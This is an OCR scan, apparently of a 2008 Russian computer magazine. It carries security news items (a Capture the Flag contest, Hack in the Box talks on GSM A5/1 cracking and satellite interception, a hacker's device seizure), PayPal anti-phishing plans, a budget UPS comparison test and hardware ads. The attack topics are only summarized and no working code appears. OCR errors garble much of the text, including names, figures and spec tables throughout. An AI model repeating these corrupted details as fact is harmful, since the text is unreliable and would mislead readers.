толи устав или банально испугавшись последствий, публично заявил на 



форуме, что бразды правления им были переданы его другу. Однако систе- 
ма работы сервера (втом числе регистрация только по приглашениям) и 
команда модераторов останутся прежними. 

Другой не менее известный трекер ТЬе Рігаіе Вау родом из Швеции су- 
дится со с звукозаписывающими компаниями уже давно, однако успешно 
продолжает работать. Параллельно с основным сервисом создатели 
активно занимаются стартами. Несколько недель назад ТЬе Рігаіе 
Вау запустили хостингблогов без цензуры. Новый сервис Вауѵѵогсіз 
( Ьаѵѵѵогсіз.сот і обещает стать безопасной бухтой для блоггеров, которые 
могут писать о чем угодно, не опасаясь, что хостинг может прикрыть их 
«лавочку». 





Саріиге ТЬе 
Над в России 

С 26 по 28 апреля в УрГУ (Екатеринбург] 
первый раз проводился открытый контестпо 
информационной безопасности в формате 
«СарШге ТЬе Ріад», в котором приняло уча- 
стие 9 команд. 

Каждая команда получила сервер с предус- 
тановленным набором уязвимых сервисов, 
причем на моментначала игры сервера ко- 
манд были абсолютно идентичными. Задача 
участников заключалась в поддержке своих 
сервисов в рабочем состоянии и взломе сер- 
веров других команд. Подробности конкурса 
можноузнать на официальном сайте ѵѵѵѵѵѵ. 
гизШога . 
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Заявился на НІТВ? 
Ответь на пару 
вопросов 

Воодушевленный предстоящим выступлением на НІТВ, один из 
мемберов ТНС готовился к вылету из аэропорта Хитроу, когда к нему 
подошли представители спецслужб и отвели в сторонку. По словам 
хакера, эти ребята были хорошо осведомлены отом, кто он такой, 
где живет и чем занимается. Не было секретом и то, что специалист 
по безопасности направляется в ОАЭ, чтобы представить доклад о 
взломе криптографического алгоритма А51 . Напомню, что именно 
он используется для шифрования данных в системах сотовой связи 
68М. Доклад обещал стать настоящей бомбой. В нем приводились 
доказательства того, что с помощью публично доступного обору- 
дования, цена которого не превышает $1000, возможно не только 
перехватить звонки и текстовые сообщения 5М5, но и расшифровать 
их! Агенты дали понять хакеру, что власти намерены убедиться в том, 
что он не вывозит из страны девайсы для криптоанализа. В частности 
их сильно заинтересовал старенький телефон хакера — Ыокіа 3310 и 
так называемый ІІБРН (ІІпіѵегзаІ Бо^ѵѵаге Рас! іо Регірбегаі) — пус- 
кай и хитрый, но все-таки доступный радиоприемник, управляемый 
программными средствами. Доводы специалиста о том, что это самое 
обычное оборудование, оказались недостаточными и каждый из де- 
вайсов был взят на экспертизу. Примечательно, что ноутбук и бумаги 
агентов почему-то совершенно не интересовали. Обеспокоенный 
хакер поделился своими переживаниями в анонимном блоге Ыод.іЬс. 
о га . где позже отписал, что оборудование ему вернули. 



Смерть сотовой связи 




ѴоІР, как и когда-то мобильные телефоны, прочно 
и основательно входят в нашу жизнь. Это не просто 
прогрессивная технология, но и потенциальная 
угроза для всех существующих сотовых операторов. 
Причины очевидны. Все больше и большетерри- 
торий покрываются беспроводными сетями ѴѴі-Рі и 
ѴѴі-Мах, а беспроводные чипы интегрируется прак- 
тически во все современные гаджеты. Раз уж можно 
воспользоваться бесплатный беспроводным каналом и копеечными 
услугами ѴоІР-операторами, то зачем тогда отдавать деньги сотовому 
оператору? Платить несколько долларов за разговор в роумин- 
ге? Действительно, незачем. Но это в будущем, а пока усилиями 
специалистов компании Бкуре удается эффективно совместить обе 
технологии в одно целое. 24 апреля они представили первую версию 
своего клиента, работающего на базе мобильного телефона с под- 
держкой Эаѵа. Совместимая с более чем 50 моделями Ыокіа, Моіогоіа, 
Багпзипд и Бопу Егісззоп, бета-версия позволяет использовать чат, 
просматривать список контактов, принимать звонки от пользователей 
и входящие вызовы БкуреІІЧ. Совершать звонки посредствам самого 
Бкуре и на городские/мобильные телефоны посредством услуги Бкуре 
Оиі да данный момент разрешено жителям лишь нескольких стран. 
Это сделано намеренно: поскольку 6РР5-соединение не может обес- 
печить достаточный для разговора канал, оно используется только 
для инициализации вызова. Сам же звонок осуществляется через 
локальный шлюз, связь с которым осуществляется по обычному 65М. 
Такие шлюзы уже установлены в Бразилии, Дании, Эстонии, Финлян- 
дии, Польши, Швеции и Великобритании. 




М8І 



МІСРЮ-5ТАР* ІЫТЕРМАТЮМАЬ 

іппоѵаНоп .шіНп зіуіе 






V 



# 



% 




Тройка видеокарт для 
ускорения ваших игр 

Технологии 3-ѴѴау §Ы и НуЬгісІ §Ы в исполнении 
М8І - высочайшая производительность и 
максимальное энергосбережение 



ѵ 4 ■ 






Эквивалентное последовательное сопротивление 
(П) при 85С (чем ниже тем лучше) 

Ні-с конденсаторы 



Обычные твердотельные конденсаторы 






Для критически важной области 
вторичного источника питания в 
К9ІЧ2 ОіатопсІ используются 
только Ні-с конденсаторы. Они 
характеризуются низким 
импедансом и высоким 
качеством полимерного 
электролита. 



Электропроводность полимера (чем выше тем лучше) 

Ні-с конденсаторы 



Обычные твердотельные конденсаторы 



іоо* 



К9Ы2 ОіатопсІ 




К9Ы2 РІаііпит 




* На базе чипсета ІМѴЮІА 
пРогсе 780а 

* Поддержка процессоров АМО 
в сокете АМ2+/АМ2 

» Двухканальная память йОК2 
1066/800/667 

* Поддержка технологии 3-ѴѴау 8І_І 

* Вторичный источник питания 
на Ні-с конденсаторах 

* Новая реализация фирменной 
технологии Сігси-Ріре 

* На базе чипсета ЫѴЮІА пРогсе 
750а ЗЫ 

№ Поддержка процессоров АМй в 
сокете АМ2+/АМ2 

* Двухканальная память ООР2 
1066/800/667 

* Поддержка технологии х8 5І_І 

* Вторичный источник питания на 
Ні-с конденсаторах 

* Новая реализация фирменной 
технологии Сігси-Ріре 



ѵ\ллл/ѵ.тісго5Іаг.ги 
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тед-ап еѵг 



Человек вместо 
витой пары 

Человек — это источникэнергии, и, в общем-то, неплохая 
батарейка, если верить фильму «Матрица» :). Но человечес- 
кое телотакже является неплохим проводником и способно 
пропускать через себя огромные массивы данных. Это на 
деле доказала японская компания ЫТТ, выпустившая на 
рынокспециальный комплект девайсов, который называ- 
ется Рігто. Главным компонентом таких устройств является 
небольшая карточка-передатчик, которая кладется в кар- 
ман или другое удобное место. Не требуя прямого контакта 
с человеком, она преобразует цифровые данные в элек- 
трический сигнал и пускает в тело человека через одежду. 
Стоит пользователю дотронуться до принимающей части 
системы, кактутже начинается процесс передачи данных. 
Текущая скорость не превышает 230 Кб/с, но разработчики 
заявляют, что технология РесІТгасбоп, используемая при 
создании устройства, в будущем позволит передавать дан- 
ные на скоростях до 10 мегабит/с. В Японии новинка стоит 
$8000 за комплект, в него входят 5 передатчиков и один 
приемник. Уже сейчас ее применяют для идентификации 
пользователей и создания систем «умного дома», а в буду- 
щем ее собираются использовать для обмена информаци- 
ей между пользователями. Хочется верить, что не за горами 
время, когда после одного единственного рукопожатия 
можно будет «выучить», скажем, японский язык :). 





РауРаІ даст ответ фишерам 

Компания РауРаІ издавна славится своей жесткой анти- 
фрод системой. К примеру, еще год назад пользователям из 
бывших союзных республик вообще нельзя было исполь- 
зовать «палку» для денежных переводов в инете. Одна из 
наиболее страшных бед для РауРаІ, как и любого другого 
онлайн учреждения, связанного с финансами, — это 
фишинг. Большинство пользователей даже не задумы- 
ваются о том, что вместо защищенного сайта компании, 
которой они доверяют, они могут попасть на сайт-двойник 
с полностью скопированным дизайном и структурой, где 
в лапы мошенников отдают свои денежки. Отчаявшись 
повторять пользователям элементарные правила безопас- 
ности, компания решила пойти на радикальные меры и в 
ближайшее время планирует заблокировать доступ к своим 
серверам посредством браузеров, не поддерживающих 
защиту фишинговых сайтов и сертификаты ЕѴ 55І_ (отличие 
от обычной 55І_ обязываетсамого поставщика сертификата 
проводить дополнительные проверки сайта при каждом 
обращении к нему и при каждой попытке запроса данных]. 

Изменения произойдут не сразу. Некоторое время сайт 
платежной системы будет предупреждать пользователя о 
возможной угрозе и необходимости использовать другое 
ПО. Однако уже в обозримом будущем наиболее уязвимые 
браузеры будутзапрещены полностью. На подобные меры, 
очевидно, могут пойти и другие финансовые учреждения, 
поэтому не поленись обновить браузер. 



► 014 
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393 письма разослал Гарри Туерк 30 Л6Т назад, став первым спамером напл 
техпор количество рекламных сообщений несколько увеличилось, не правда ли? :) 



Наск іп ІІіе Вох в Дубае прошел на «ура» 



С 14 по 1 7 апреля десятки ведущих ІТ-специалистов купались в водах 
Персидского залива и участвовали в конференции Наск іп Ше Вох 2008 
в Дубай. Диллон Эндрю, организатор конференции, задумывал НІТВ как 
элитарное мероприятие для узкого круга лиц, непонаслышке знакомых 
с хакерской тематикой. И за свои слова он отвечает. В этот раз своими 
выступлениями участников вдохновляли известнейшие Брюс Шнайр и 
Джереми Гроссман, а свои доклады представляли авторитетнейшие гуру 
среди ІТ-безопастников. Вотлишь наиболее интересные из них: 

1. Техника взлома алгоритма 65М А5/1 , позволяющая взломать системы 
шифрования 05М за считанные секунды. Для перехвата разговоров и со- 
общений 5М5 используется свободно распространяемое оборудование. 



2 . Взлом Ѵ5АТ — описание технологи и, аналогичное Родие АР для ѴѴі-Рі, 
которая реализует атаку Мап-іп-Ше-МісІсІІе для двухсторонних спутни- 
ковых систем. Проще говоря, позволяет перехватить данные дорогущих 
5 АТ- систем. 

3. Доклад об уязвимостях ѴоІР от итальянских спецов о новых возможно- 
стях перехвата голосового трафика в ІР-сетях. 

4 . Описание новых подходов ко взлому ЕтЬесІсІесІ устройств, набирающих 
обороты в 50Н0-сегменте, в том числе: точек доступа, ѴѴі-Рі камер, А05І_- 
шлюзов, роутеров и т.д. 

Презентации и все сопутствующие данные, выложенные организаторами 
на своем официальном сайте, ты найдешь на нашем диске. 





Версия 7.0 



Комплекс 3-х технологий защиты для борьбы 
с самыми опасными интернет-угрозами 



Первый уровень защиты 

Проверка по образцам в базах сигнатур 



Второй уровень защиты 

Эвристический анализ программ 



Поведенческий блокиратор 



на правах рекламы 



Вирус 

спутал 

ваши 

'планы 9 . 

■ 

■ 



!ИчгпМ Зесигііу 




т'еггигм 




АЛЕКСЕЙ ШУВАЕВ КИРИЛЛ АВРОРИН 



УСПЕТЬ СОХРАНИТЬСЯ 



Ремонт в квартире соседей, перфоратор, подключенный в паре метров от компа, 
электросварка. . . - все это может сгубить чуткое к помехам железо. После того, 
как соседка дважды перепутала предохранители у электросчетчика, - я обзавел- 
ся ИБП. 



Такой девайс убережет не только данные и железо, но, самое главное, 

— нервы. Впрочем, покупать ради сохранения документов собственную 
подстанцию неразумно. Поэтому мы решили провести сравнительное 
тестирование бюджетных ИБП. Их мощности достаточно, чтобы питать 
офисный или домашний компьютер в течение 5-10 минут — вполне 
хватит, чтобы в случае перебоев с электроэнергией успеть сохраниться 
и завершить работу. 

И МЕТОДИКАТЕСТИРОВАНИЯ 

Для проверки функциональных возможностей ИБП мы провели полную 
зарядку батарей каждой модели. По заверениям производителей, 
достаточно 8 часов для зарядки опустошенных аккумуляторов до 
уровня 90%. Для верности мы дали отстояться девайсам около суток. В 
качестве тестового стенда использовали производительный компью- 
тер, характеристики которого также приведены. К бесперебойнику 
был подключен 20-тидюймовый ЖК-дисплей и ѴѴі-Рі роутер — эдакий 
усредненный вариант домашнего компьютера, ориентированный на 
выполнение разноплановых задач. 

Основным критерием возможностей тестируемых бесперебойников яв- 
ляется время автономной работы под нагрузкой. Для загрузки компью- 
тера мы использовали утилиту ВаІТегу Еаіег’05 версии 1 .0 в стандарт- 
ном режиме работы. Этоттестовый пакет неплохо нагружает систему, 
но надо учитывать, что при наличии мощной видеокарты и запуске 
ресурсоемких ЗБ приложений потребляемая мощность компьютера вы- 




Тестовый стенд: 

|ПроцессорПгйе^о^^Рйо Е6850| 

|Кулер^а[таг^НР5^ 

|Платформа!А5Ц^5^^| } 

Память: 7П02^Гктд5^оп РРВ2, РС-8000, 1 0ООДЧТиД 

|видеокарта^^Мб^Патіёс^еРо^е 8800 &Т^ 
ІВинчестер^О^^^ёзіёПшдйаПоООАЯ^^ОО об/мин, 8 Мб| 
Блок питания: 580 Вт, Н і ре^ 

Монитор: 21", Батвипд 21 5ТѴѴ 

Питание мыши: 115В 




Питание клавиатуры: Р5/2 
Устройства 3.5": нет 
Устройства 5.25": Оптический привод А5115 РВѴУ-1814ВЕТП 



растет. Кроме того, было открыто несколько офисных документов и окон 
браузера, а также поставлен файл на закачку, чтобы нагрузить роутер. 
Если опираться на показания софта, идущего в комплекте, потребляе- 
мая мощность всей системы колебалась в промежутке от 1 86 до 230 Вт. 
Отдельное внимание уделялось программному обеспечению, идущему 
в комплекте, так как от его функциональности зависит очень многое. 
Например, автоматическое отключение через заданный промежуток 
времени или по достижению определенного уровня разряда аккумуля- 
тора. Чтобы вычислить полное время автономной работы, мы отрубали 
автоматическое отключение и выдерживали компьютер до полной по- 
садки батарей. Надо сказать, не все ПО справилось со своей работой на 
«отлично», так что после установки и подключения проверь настройки 
программ. 

Одним из важных показателей работы ИБП является минимальное 
напряжение в сети, после которого осуществляется переход на питание 
от батарей. Путем внедрения в цепь питания между сетью и ИБП лабо- 
раторного автотрансформатора мы меняли напряжение, подаваемое 
на бесперебойник, в диапазоне от 0 до 260 Вольт. Таким образом, мы 
получили точки перехода устройств на автономное питание. 



ВРЕМЯ АВТОНОМНОЙ РАБОТЫ, МИН 



Ірроп Васк Ѵегзо 
400 

Ірроп Васк Сот^о 
Рго боо 

СуЬегРоѵѵегѴаІие 

8ооЕ 

СуЬегРоѵѵегѴаІие 

бООЕ 

АРСВЕ700-Р5 

АРСВЕ550-К5 

00:00 01:00 02:00 03:00 04:00 05:00 06:00 07:00 08:00 09:00 10:00 11:00 



Основной характеристикой ИБП является время автономной работы 



ТЕ5Т_ЬАВ ВЫРАЖАЕТ БЛАГОДАРНОСТЬ ЗА ПРЕДОСТАВЛЕН- 
НОЕ НАТЕСТИРОВАНИЕ ОБОРУДОВАНИЕ КОМПАНИИ МЕРЛИОН 
(Т.(495) 739-0959, ѴѴ№ѴѴ.МЕКЫО N.1111), А ТАКЖЕ РОССИЙСКИМ 
ПРЕДСТАВИТЕЛЬСТВАМ КОМПАНИЙ СѴВЕКРОѴѴЕК И АРС 
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Тег гит 




Технические характеристики: 

[Щщн О ёті г 'іЩ\ : 550 

ззо 

ШШШВИИ*. : шшш 

Количество выходных разъемов питания: 

4 автономных, 4 без поддержки автономной работы 

Вре мя полной зарядки: и 
Количество автономных розеток: 4типа евро 
: Ц фВаЕЕВВШ 

Дополнительно: защита телефонной/модемной линии 

Габариты, мм: 230x86x285 

(ВШК-бШ 



ИИ-.Щ.1.НМ 

Технические характеристики: 

Мощность, ВА: 700 

40$ 

Входное наЩяжёние: 180-266 В 
Количество выходных разъемов питания: 

4 автономных, 4 без поддержки автономной работы 

Время полной зарядки: и 
Интерфейс подключения: 115В, Р5-232 
Дополнительно: защита телефонной/модемной линии 

Габариты, мм: 230 х86хЩр 
Рес, кг: бД 




О О 



О 



Интересный девайс от известного производителя источников бесперебой- 
ного питания. Чем-то он напоминаетсетевой фильтр.только увеличенный 
в размерах. Устройство, по габаритам сравнимое с ЬагеЬопе-компьютером, 
займет нетак много места, тем более, его вполне можно разместить под сто- 
лом. Этотуниверсальный ИБП можно использовать и для бытовой техники 

— благодаря наличию стандартных евророзеток. На верхней панели их 
имеется восемь штук, но только четыре из них способны поддерживать нор- 
мальную работу при отсутствии напряжения в сети. Оставшиеся служат для 
фильтрации подаваемого напряжения. Простота подключения и индикации 
работы — большой плюс инженерам, поработавшим над этим устройством. 
При отключении питания АРС ВЕ550-Р5 оповеститтебя звуковым сигналом 

— настойчивым, но не слишком громким. Мощность ИБП составляет 330 Вт. 
Подойдет для домашнего компьютера, но стоит понимать, что для мощной 
игровой системы его попросту может не хватить — потребление совре- 
менных видеокартуже перескочило за 1 00 Вт на каждую, а если поставить 
массив? Во время тестирования наш компьютер проработал почти 6 минут 

— успеешь сохранить все офисные документы или выйти из игры и отклю- 
чить компьютер. Если же ты используешь девайс в качестве автономного 
источника для подключения бытовой видеотехники, и отключение не пла- 
нируется на долгий срок... — можешь смело продолжать смотреть фильм. 
Приятно порадовал тот фа кт, что устройство переходит на питание от бата- 
рей при достижении критического порога в 140 Вольт— в домах с частым 
падением напряжения это сохранитаккумуляторы. В качестве бонуса есть 
защита телефонной/модемной линии, но помни, что функционироватьона 
будеттолько при правильном подключении ИБП, то есть при наличии за- 
земления. Всем хорош девайс. К минусам можно отнести только габариты: с 
такими размерами устройства бывают и существенно большей мощности. 



Еще один источникбесперебойного питания от известного американского 
производителя. От предыдущей модели отличается более емкими аккуму- 
ляторами, а также большей мощностью — 405 Ватт (против 330 у младшей 
модели). Большинство характеристик схожи, но АРС ВЕ700-Р5 
обладает несомненным преимуществом: во время испытания этот ИБП 
продержался 8,5 минут, чего вполне достаточно, чтобы завершить работу с 
фотографиями (например, в РИоІозЬор) и корректно отключить компьютер. 
Притом, что у нас довольно производительная система — рядовой офисный 
компьютер такой бесперебойник может подпитывать почти вдвое дольше. 
Отметим удобство программного обеспечения, входящего в комплект по- 
ставки. Крайне информативная утилита РоѵѵегСЬиІе Регзопаі выдает мак- 
симум сведений о процессе функционирования устройства: текущий режим 
работы, нагрузка на батареи, потребляемая мощность и прочее. Даже 
простому пользователю будет интересно узнать о состоянии питающей сети 
или возможностях девайса. Кстати, с помощью ПО можно задать действие, 
которое будет выполняться при исчезновении напряжения. Информация 
собирается и сохраняется, а в результате™ прочитаешь подробную стати- 
стику событий. Опираясь на данныетестирования напряжений перехода на 
батареи, можно сказать, что эта модель более чувствительна к перепадам 
напряжения — уже с 205 Вольт девайс начинает существовать автономно 
(ситуация с падением напряжения ниже 180 довольно типична для загород- 
ных домов во время отопительного сезона). Как и у предыдущей модели, 
в этой реализована защита телефонной линии, а также имеется восемь 
розетокевропейскоготипа, четыре из которых — с автономным питанием, 
а остальные — защищают отперепадов напряжения. К недостаткам можно 
отнести габариты устройства, но и этот не достаток легко списать, если рас- 
положить ИБП в укромном месте. Только помни, что любая техника должна 
иметь путь для теплоотвода и вентиляции. 
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СуЬег Роѵѵег Ѵаіие 600Е 




Мощность, ВА: 800 



Ріфщноё|ЬхЩт: 4.80І 



Входное напряжение: 165-270 В 
Количество выходных разъемов питания: 

3-автономныж 

Врё м яшбл но;й[за р.я д ки 1 8М 

очения: 115В, К5-232 



Дополнительно: нет 
Габариты, мм: 100x140x320 



О о 



Технические характеристики: 

Мощность, ВА: боо 

Мощност ь, Вт : 360 

Входное напряжение: 165-270 В 

Ій® ичество выходных разъемов питания: 

3 автоном ных 

Интерфейс подключения: 1158,85-232 
Дополнительно: нет 
Габариты, мм: 100x140x320 
МШП 5Щ 

••••••••00 

Традиционный, сточки зрения обывателя, источникбесперебойного 
питания представляет собой стандартный блоке кнопкой включения 
питания на передней стенке и световым индикатором работы. Все разъемы 
для подключения аппаратуры расположены на задней стенке — провода 
будут скрыты от посторонних глаз. Если места на столе не хватает — этот 
компактный девайс придется очень кстати. Для сбора информации о 
состоянии устройства ты можешь подключить ИБП к компьютеру как по 
старому интерфейсу В5-232, так и по новому — 1)5В. Во время теста девайс 
переходил на питание от аккумуляторов при достижении минимального 
порога в 1 65 В. СуЬегРоѵѵегѴаІие 600Е неплохо показал себя в автономной 
работе — больше 6 минутсмог поддерживать активность нашего тестово- 
го стенда. К недостаткам можно отнести отсутствие стандартных розеток 
для подключения аппаратуры — по сути, ты сможешь подключить только 
системный блок и монитор. Правда, существуютспециальные переходники 
на обычные европейские розетки, но почему бы сразу не сделать одну или 
две розетки? Ведь подключить роутер или иной девайс, не имеющий такого 
разъема, будет проблематично. Хотя требовать отустройства стоимостью 
чуть больше 1 0ОО рублей наличия дополнительных опций не стоит. Время 
полной зарядки аккумуляторов составляет около 8 часов, а простота инди- 
кации и подключения являются большим плюсом. Такие ИБП пользуются 
популярностью нетолько в офисах, но и, что интересно, в местах, куда 
доступ осуществляется не так часто, но необходимость в бесперебойном 
питании существует — например, в роутерах домашних сетей, которые 
обычно монтируются на чердаках. Работать роутер оттакого источника 
может до часа, так как мощность, потребляемая им, редко бывает больше 
30 Ватт. Поэтому присмотрись к этому устройству, если ты хочешь построить 
недорогую, но бесперебойную сеть. 



Этот блок обладает большей мощностью, чем его предшественник, а значит 
можно рассчитывать на большее время работы или подключить более произ- 
водительный компьютер. Тестовая система продержалась на батареях почти 
10 минут. Очень неплохой результат! Блок выглядит так же, как и младшая 
модель, потому позаимствовал все достоинства и недостатки. Простота ин- 
дикации и управления сведена к одному выключателю и одному световому 
индикатору на передней панели. Если обратишь внимание на заднюю стенку 
ИБП, заметишь, что имеются трехпиновые стандартные разъемы. Несколько 
не хватает стандартной европейской розетки для подключения периферии, 
например, роутера. В результате, для полной функциональности надо будет 
купить переходник. Хорошие показатели получены и при замерах напряже- 
ния перехода на аккумуляторы — 1 65 В. Приятно порадовало и программное 
обеспечение, идущее в комплекте. Утилита РоѵѵегРапеІ Регзопаі ЕсІіТіоп про- 
ста и удобна в использовании — сразу после подключения программа авто- 
матически распознаетустройство и выводит всютехническую информацию. 
Этот ИБП можно рекомендовать обладателям производительных систем, 
не желающим вкладывать большие средства в систему энергоснабжения. 
Сразу советуем обзавестись переходником для подключения устройств со 
стандартными вилками (особенно, если пользуешься ВЭБ-модемом, требу- 
ющим отдельного питания). Не стоит подключать к ИБП лазерный принтер 
— его мощность такова, что в моменты пиковой загрузки может вывести из 
строя бесперебойник. 



НАПРЯЖЕНИЕ ПЕРЕХОДА В АВТОНОМНЫЙ РЕЖИМ, ВОЛЬТ 



Некоторые устройства переходят на батарею при малейшей просадке 
напряжения 



Ірроп Васк Ѵег50 
400 1 

Ірроп ВаскСотТо 
Ргобоо 

СуЬегРоѵѵегѴаІие 
8ооЕ 1 

СуЬегРоѵѵегѴаІие 
бооЕ 1 

АРСВЕ700-В5 



АРСВЕ550-Р5 



► 018 
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Технические характеристики: 

Мощность, іВА: боо 

рОЩНОСТЬ', |Щ: ЗбО 

Входное напряжение: 154-264 В 
Количество выходных разъемов питания: 

4 автономных, 2 без поддержки автономной работы 

Интерфейс подключения: 115В, В5-232 
Дополнительно: защита телефонной/модемной линии 
Габариты, мм 300 x 124 x 210 

йг , Фаі№ : 7і 
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Технические характеристики: 

Р.О|ДНр СТ!Ь/§||\ : 400 
:|^ЩНб^ЩВт: 200 
Входное напряжение: 154-264 В 
Количество выходных разъемов питания: 

4 автономных, 2 без поддержки автономной работы 

Щрёмя, пол но йза ряд ки : 8;й 
Интерфейс подключения: 1)5В, К5-232 
Дополнительно: защита телефонной/модемной линии 

Габариты,мм: 124 x 166 x 202 
Вес, кг: 3-3 



Самый тяжелый и, вместе с тем, довольно удачный ИБП от еще одного из- 
вестного производителя. Аккуратный блок с удобной ручкой для переноски 
на верхней панели, интересный дизайн и простота конструкции — всесостав- 
ляющие успешного продукта. Габаритами блок скромен, а внешним видом 
— опрятен и займет немного места на рабочем столе или под столом, рядом с 
системником. На задней панели ИБП расположены два блока потри разъе- 
ма, один из которых запитывается от батарей, а на второй подается питание 
через сетевой фильтр. В каждом блоке изтрех разъемов два предназначены 
для подключения системника и монитора, атретий представлен стандартной 
европейской розеткой. К этому выходу можно запросто подключить 05Б- мо- 
дем или роутер, через который может осуществляться связь с Сетью. Тогда, в 
случае исчезновения питания, ты спокойно можешь попрощаться с собесед- 
ником и не торопясь завершить работу. Тестовые замеры показали переход 
на питание от батарей при 1 65 В. Бесперебойное питание компьютеру блок 
обеспечивал в течение шести с половиной минут. Собирать информацию 
о системе ты сможешь, подключив ИБП к СОМ-порту или к ЦІЗВ — на твое 
усмотрение. Пришло время и для ложки дегтя. При попытке запустить про- 
грамму сбора информации и статистики возникла проблема. Заключалась 
она в невозможности работы утилиты, написанной на ]аѵа. Переустановка 
Заѵа и загрузка обновленной версии результата не изменили. Вероятно, та- 
кая проблема наблюдается из-за несоответствия каких-либо программ, но 
ктакому исходу надо быть готовым. Таким образом, тебе придется опираться 
на свой опыт, интуицию и секундомер. В результате, мы можем рекомендо- 
вать этот ИБП пользователям, которые не намерены загромождать память 
компьютера дополнительными утилитами и тем, кому необходимо сберечь 
оборудование со стандартными вилками. 



••••••••00 

Завершаетнашетестирование оченьстильный бесперебойник. Если поста- 
витьегорядомсЬагеЬопе.тосразуи не разберешь, где компьютера где ИБП. 
Компактный «кубик» обладает заявленной мощностью в 200 Вт — немного, 
но посмотрим, каков он в работе. Девайс оснащен шестью разъемами, четы- 
ре из которых продолжают выдавать питание, даже когда в сети его нет. Блок 
Ірроп Ьаск Ѵегво 400 функционирует без проблем вплоть до падения напря- 
жения до 154 Вольт, после чего переключается на питание от собственных 
батарей. Собратьинформациюосостоянииустройства и батарейты можешь, 
подключив устройство по шине 115В или кС0М-порту.Увы,тутвозникла про- 
блема, так каксофт написан наіаѵа и категорически отказывался правильно 
функционировать. Смирившись с этим, ты можешь получить стильное, ком- 
пактное и легкое устройство, защищающее твой компьютер от перебоев пи- 
тания и телефонную линию отскачков напряжения. Наверняка тебе интерес- 
но, сколько же продержался этот малыш без питания, да еще под нагрузкой 
такого компьютера? Ірроп Ьаск Ѵегзо 400 смог поддерживать жизнь компа в 
течение 3,5 минут. Последующая полная зарядка аккумуляторов потребует 
порядка 8 часов. Конечно, времени автономной работы совсем не много, но 
для того, чтобы сохранить важный документ — вполне хватит. Кроме того, 
бесперебойник рассчитан на существенно более слабые компьютеры, чем 
тот, что использовался для теста. Его можно смело рекомендовать в подарок 
любимой девушке — перед тем, как в очередной раз исчезнуть в ходе ви- 
деоконференции, она успеет спросить: «ой, а что это у меня пищит»? Столь 
интересное устройство при своей небольшой цене претендует на награду и, 
соответственно, покупку. 



г ВЫВОДЫ 

По результатам проведенного тестирования однозначную победу 
одержал АРС ВЕ700-Р5 — ему присуждается приз «Выбор редакции». 
Удобство, функциональность и эргономичность — важные качества 



для любого продукта. Второй приз мы присудили устройству Ірроп Васк 
Ѵегзо 400 за интересный дизайн, удобство и логичность. Не забывай 
сохраняться, береги свой компьютер, и он будет служить тебе верой и 
правдой. нс 
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5ЕМЫНЕІ5ЕРР 131 



ОТЛИЧНАЯ ГАРНИТУРА ДЛЯ ИГР И ѴОІР-СЕРВИСОВ 




лит дотянуться даже до самого дальне- 



го источника 



звука, причем 



лишняя его часть 



Замечательная гарнитура РС 13 1 от ком- 
пании «Сеннхайзер Аудио» — как раз тот 
случай, когда самая обыкновенная вещь, 
от которой не ждешь ничего сверхъесте- 



ственного, может доставить массуудо- 
вольствия и радости. Важное ее отличие 
от гарнитур других производителей - вы- 
сочайшее качество и продуманная эрго- 
номика. Если через час пользования обыч- 
ной гарнитурой голова начинает пухнуть, 
а уши — требовать свободы, то с гарниту- 
рой от Зеппйеізег ты даже не заметишь, 



что на голове что-то есть, настолько 
продумана ее конструкция! 

Длинный трехметровый провод позво- 



удобно наматывается на катушку и не бу- 
дет болтаться под ногами. А микрофон не 
придется долго крутить и вертеть, чтобы 
твой собеседник тебя услышал. Твою речь 
он захватывает из любой позиции и удаля- 
ет посторонние звуки с помощью функции 
шумоподавления. 

ТЕХНИЧЕСКИЕХАРАКТЕРИСТИКИ 



С ПОМОЩЬЮ 
5ЕЫМНЕІ5ЕКТЫ СМОЖЕШЬ: 



1 . Вдоволь общаться с друзьями из других городов и даже стран. Единствен- 
ное условие — у тебя и собеседника должен быть установлен Вкуре (уууууу. 
зкѵре.сот ) или бііто [ ѵѵѵѵѵѵ.аіггпоргоіесі.согп ]. Плату за разговор никто 

не возьмет, все бесплатно! А вот для того, чтобы позвонить на городской 
или мобильный телефон, придется заплатить денежку. Но даже по нашим 
российским меркам, плата совсем небольшая. 

2. Выиграть 5 ящиков пива, обыгравуверенного в себе противника по 
интернету. Воттебе важный хинт: даже в тех играх, где общение голосом не 
предусмотрено, вполне реально использовать умопомрачительную тулзу 
ТеатВреак (ѵѵѵѵѵѵ.доіеатзреак.сот і и легко обсуждать все действия со 
своей командой голосом. Любое преимущество оправдано! 



Наушники: 

ЩЙ.ЩІ 30- 18 000 Г ц 



Сопротивление 32 п 

1 1 8 дБ 

Г.лина кабели 3 м 



Микрофон: 



ЦИЦтота 

ііивЕяіваиаіііЫНШІ 
СопротивлеЦ^. . . . 



80 Нг- 15 000 Гц 

(-) 38 сІВѴ/Ра 

2 к!) 



3. Насладиться по-настоящему качественным звучанием любимых музы- 
кальных произведений. Выжать максимум из своей звуковой карты поможет 
подключаемый к популярным проигрывателям плагин йРХ (уудадаЛхвоштсГ 
сот ]. С ним совершенствуются частотные характеристики и устраняются 
два главных недостатка — срез высоких частот и недостаточное разделение 
стереобазы и ее глубины. 






т'еггигм 



4 девайса 




ЙХ-2140К і 

Лазерный принтер Звук для твоей комнаты 

скромных размеров 



Технические характеристики: 

Разрешение печати: 2400хб00т/д 

Процессор: 181 МГц 

Память: 8 Мб 

Интерфейс: 115В 2.0 

Эмуляция 601 

Емкость лотка для бумаги: 250 листов 
Габариты: 368x361 ХІ 70 мм 
Вес: 5,8 кг 




1. Принтер незанимаетмного места, крометого, нет выступающих лотков 
— удобно эксплуатировать в тесном или ограниченном пространстве. 

2 . Подключения и настройка простые — принтер подключается по шине 
115В, а сустановкой драйверов справится любой. 

3. Яркий световой индикатор оповестито состоянии работы принтера. 

4 . Емкий лотокна 250листов весьма практичен — при небольших объемах 
печати не придется часто пополнять запас бумаги. 

5 . Работает девайс довольно тихо и быстро — первая страница была распе- 
чатана спустя 8 секунд после запуска печати. 

6 . Десять страниц убористого текста принтер выдал за 35 секунд — непло- 
хой р езул ьтат дл я та ко го «малыша». 

7 . Подача бумаги может осуществляться как из лотка, так и по одному листу 
(через специальное отверстие). 

8 . Замена картриджа стонером производится втри действия: откинуть 
крышку, заменить картридж, закрыть крышку. Не требуется никаких инст- 
рументов. 

Ѳ 

1. Светодиодные индикаторы режимов работы расположены на верхней 
панели и не видны, если принтер расположить вышеуровня глаз. 



Техническиехарактеристики: 

Мощность^ Вт КМ5 на канал (2 канала) 

12 Вт КМ5 (сабвуфер) 

